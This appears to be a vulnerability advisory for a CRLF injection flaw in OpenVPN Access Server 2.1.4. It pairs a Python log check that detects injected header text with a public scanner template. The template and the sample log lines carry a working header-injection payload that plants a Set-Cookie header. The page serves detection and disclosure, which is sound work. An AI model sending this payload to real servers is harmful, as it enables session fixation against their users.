CVE-2017-5868: OpenVPN Access Server 2.1.4 - CRLF Injection

Date: 2025-08-01 | Affected software: OpenVPN Access Server | PoC: Public

Vulnerability description

CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via "%0A" characters in the PATH_INFO to __session_start__/.
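
A log check for the request shape described above, added here as an example and not part of the original advisory or of OpenVPN's code: it flags requests to `__session_start__/` whose path decodes to a CR or LF and reports the text that would become an injected header line. The combined-style access-log format, the function names and the sample lines are assumptions; the repeated decoding goes beyond the single-encoded `%0A` case in the description so that double-encoded input is also surfaced.

```python
import re
from urllib.parse import unquote

# Request line inside a combined-style access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
SESSION_PREFIX = "/__session_start__/"
MAX_DECODE_ROUNDS = 3  # assumption: enough to expose double encoding such as %250a


def decode_fully(target: str) -> str:
    """Percent-decode repeatedly so nested encodings are exposed."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def find_crlf_requests(log_lines):
    """Return (line_number, injected_text) for suspicious session-start requests."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path = decode_fully(match.group("target").split("?", 1)[0])
        if not path.startswith(SESSION_PREFIX):
            continue
        # Anything after the first CR or LF would become its own header line.
        parts = re.split(r"[\r\n]+", path, maxsplit=1)
        if len(parts) == 2:
            hits.append((number, parts[1].strip()))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2025:10:00:00 +0000] "GET /__session_start__/ HTTP/1.1" 302 0',
    '192.0.2.44 - - [01/Aug/2025:10:00:05 +0000] "GET /__session_start__/%0aSet-Cookie:%20crlfinjection=1; HTTP/1.1" 302 0',
    '192.0.2.44 - - [01/Aug/2025:10:00:09 +0000] "GET /__session_start__/%250d%250aX-Test:%25201 HTTP/1.1" 302 0',
    '192.0.2.51 - - [01/Aug/2025:10:00:12 +0000] "GET /static/%0a HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, injected in find_crlf_requests(SAMPLE_LOG):
        print(f"line {number}: injected header text {injected!r}")
```

A hit only shows that the request was made; whether the header was actually reflected depends on the server version handling it.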

PoC code [public]

id: CVE-2017-5868

info:
  name: OpenVPN Access Server 2.1.4 - CRLF Injection
  author: ritikchaddha
  severity: medium
  description: |
    CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via "%0A" characters in the PATH_INFO to __session_start__/.
  reference:
    - https://www.openwall.com/lists/oss-security/2017/05/23/13
    - http://www.securitytracker.com/id/1038547
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5868
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-5868
    cwe-id: CWE-93
    epss-score: 0.08462
    epss-percentile: 0.92021
    cpe: cpe:2.3:a:openvpn:openvpn_access_server:2.1.4:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: openvpn
    product: openvpn_access_server
    shodan-query: cpe:"cpe:2.3:a:openvpn:openvpn_access_server"
  tags: cve,cve2017,openvpn,crlf,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/__session_start__/%0aSet-Cookie:%20crlfinjection=1;"

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - "^Set-Cookie: crlfinjection=1;"

      - type: status
        status:
          - 302
# digest: 4b0a00483046022100b8ad47dc363090f5f531fa45e6fba87474815b9f37312f159772352809c69713022100d04f41e8434d527726becff11c3c315f9ee96df63829e15f3a9eaf8f874cb593:922c64590222798bb761d5b6d8e72950
